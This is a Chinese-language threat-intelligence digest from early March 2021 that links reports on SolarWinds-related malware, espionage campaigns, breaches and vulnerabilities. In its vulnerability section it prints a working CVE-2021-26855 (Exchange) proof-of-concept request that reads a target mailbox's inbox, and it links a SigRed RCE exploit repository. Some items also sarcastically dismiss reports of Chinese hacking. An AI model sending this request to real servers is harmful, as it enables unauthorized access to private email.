高级威胁分析
1、微软GoldMax,GoldFinder和Sibot的恶意软件与SolarWinds的供应链攻击事件相关。火眼也发布了相关恶意软件分析。
https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html
2、针对阿联酋和科威特政府机构的网络间谍活动
https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies
3、神秘网络犯罪组织,针对欧洲,亚洲和北美的工业组织作为信息盗窃活动的一部分。恶意软件包括:除了AZORult,还使用诸如AgentTesla,Formbook,Masslogger和Matiex之类的信息窃取恶意软件
https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf
技术分享
1、WEB渗透技术
https://www.xmind.net/m/2QyGbx/#
2、来自netlab 发布的利用QNAP NAS 设备命令执行漏洞挖矿攻击
https://blog.netlab.360.com/qnap-nas-users-make-sure-you-check-your-system/
netlab另一个gafgtyt僵尸网络报告
https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/
3、Remote Code Exection Exploit for CVE-2020-1350, SigRed.
https://www.bleepingcomputer.com/news/security/windows-dns-sigred-bug-gets-first-public-rce-poc-exploit/
https://www.graplsecurity.com/post/anatomy-of-an-exploit-rce-with-cve-2020-1350-sigred
https://github.com/chompie1337/SIGRed_RCE_PoC
数据泄露
1、俄罗斯黑客论坛数据泄露,涉及2月的Crdclub和3月的Exploit和Maza。
https://www.flashpoint-intel.com/blog/breelite-cybercrime-forum-maza-breached-by-unknown-attacker/
2、航空IT公司SITA的数据泄露影响了多家航空公司,SITA是一家专门从事航空运输通信和IT的跨国公司,存储在SITA旅客服务系统(PSS)Inc.服务器上的某些旅客数据发生泄露(被黑了),该公司为航空公司运营旅客处理系统。
https://www.sita.aero/pressroom/news-releases/sita-statement-about-security-incident/
漏洞相关
1、Linux内核中修补的特权升级错误,本地提权
https://seclists.org/oss-sec/2021/q1/107
2、VMware 的View Planner RCE漏洞修复程序
https://nvd.nist.gov/vuln/detail/CVE-2021-21978
3、CVE-2021-26855 POC
POST /ecp/poc-2021-26855.js HTTP/1.1Host: <target>User-Agent: Mozilla/5.0Cookie: X-BEResource=<Target's FQDN>/EWS/Exchange.asmx?a=~1942062522;Connection: closeUpgrade-Insecure-Requests: 1Content-Type: text/xmlContent-Length: 845<soap:Envelopexmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'><soap:Header><t:RequestServerVersion Version="Exchange2016" /></soap:Header><soap:Body><m:FindItem Traversal='Shallow'><m:ItemShape><t:BaseShape>AllProperties</t:BaseShape></m:ItemShape><m:ParentFolderIds><t:DistinguishedFolderId Id='inbox'><t:Mailbox><t:EmailAddress>[email protected]</t:EmailAddress></t:Mailbox></t:DistinguishedFolderId></m:ParentFolderIds></m:FindItem></soap:Body></soap:Envelope>
https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
网络战与网络情报
1、立陶宛安全报告:
立陶宛维尔纽斯(美联社)-立陶宛情报部门周四的一份报告称,与俄罗斯情报有关的黑客组织去年对立陶宛高级官员和决策者进行了网络攻击,并利用波罗的海国家的技术基础设施作为打击其他地方目标的基础。
年度国家安全威胁评估报告声称,除其他外,俄罗斯网络间谍组织APT29涉嫌与俄罗斯情报服务有联系,“利用”立陶宛的信息技术基础设施“对来自外国的攻击进行APT29攻击,这些外国实体正在开发COVID-19疫苗。
https://apnews.com/article/lithuania-coronavirus-pandemic-covid-19-pandemic-national-security-russia-4f643495296f645e8957594034ec0367
2、这一定是外媒抹黑:
Russian and Chinese hackers gained access to EMA
https://www.volkskrant.nl/nieuws-achtergrond/russian-and-chinese-hackers-gained-access
-to-ema~bdc61ba59/?referrer=https%3A%2F%2Ft.co%2F
3、这也是外媒抹黑:Chinese Hacking Spree Hit an ‘Astronomical’ Number of Victims
https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/
4、美国国家安全局和国土安全部的网络安全与基础设施安全局(CISA)本周发布了有关保护DNS(PDNS)的联合指南。
https://media.defense.gov/2021/Mar/03/2002593055/-1/-1/0/CSI_PROTECTIVE%20DNS_UOO117652-21.PDF
5、2021年国家威胁评估。
https://www.vsd.lt/wp-content/uploads/2021/03/2021-EN-el_.pdf
本文始发于微信公众号(ThreatPage全球威胁情报):今日威胁情报2021/3/4-6(第355期)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论